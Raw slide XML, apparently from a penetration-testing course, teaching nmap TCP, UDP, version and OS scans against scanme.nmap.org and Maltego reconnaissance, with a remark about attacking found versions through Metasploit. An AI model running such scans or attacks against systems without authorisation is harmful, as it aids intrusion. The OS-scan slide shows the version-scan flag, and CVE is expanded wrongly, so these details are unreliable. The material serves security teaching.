          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157725" y="136575"/>
            <a:ext cx="84720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TCP Connect Scan using NMAP &amp; Wireshark</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633150" y="4351050"/>
            <a:ext cx="7521000" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>When a port is closed</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nmap -p 81 -sT scanme.nmap.org </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="433" name="Google Shape;433;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1587947" y="807488"/>
            <a:ext cx="5611481" cy="1685400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="434" name="Google Shape;434;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="339656" y="2546531"/>
            <a:ext cx="8289994" cy="180273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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157725" y="136575"/>
            <a:ext cx="84720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UDP Scan using NMAP &amp; Wireshark</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Google Shape;441;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312750" y="3516731"/>
            <a:ext cx="8831100" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>UDP Scan is slower than TCP Scan</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>bash-3.2# nmap -sU scanme.nmap.org </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>UDP scan works by sending a UDP packet to every targeted port. For most ports, this packet will be empty (no payload), but for a few of the more common ports a protocol-specific payload will be sent. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="442" name="Google Shape;442;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140163" y="1431450"/>
            <a:ext cx="6305213" cy="208528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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157725" y="136575"/>
            <a:ext cx="84720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Version Scaning using NMAP </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Google Shape;449;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87244" y="893756"/>
            <a:ext cx="3612600" cy="4043400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="83333"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-270827" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nmap -sV scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-270827" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Finding application versions is a crucial part in penetration testing. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-270827" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It makes your life easier since you can find an existing vulnerability from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Common Vulnerabilities and Exploits (CVE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> database for a particular version of the service. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-270827" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We can then use it to attack a machine using an exploitation tool like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="450" name="Google Shape;450;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4044713" y="832425"/>
            <a:ext cx="5099287" cy="345004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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157725" y="136575"/>
            <a:ext cx="84720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Operating System Scanning using NMAP </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Google Shape;457;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87244" y="893756"/>
            <a:ext cx="3612600" cy="4043400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>nmap -sV scanme.nmap.org</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nmap can provide information about the underlying operating system using TCP/IP fingerprinting.  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>OS detection is not always accurate, but it goes a long way towards helping a pen tester get closer to their target.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="458" name="Google Shape;458;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4044713" y="832425"/>
            <a:ext cx="5099287" cy="34500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5"/>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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="4419000" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>sudo apt install maltego</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Google Shape;215;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="13308" t="11777" r="41668"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974175" y="1017725"/>
            <a:ext cx="4116924" cy="3849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1"/>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Normal Output</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
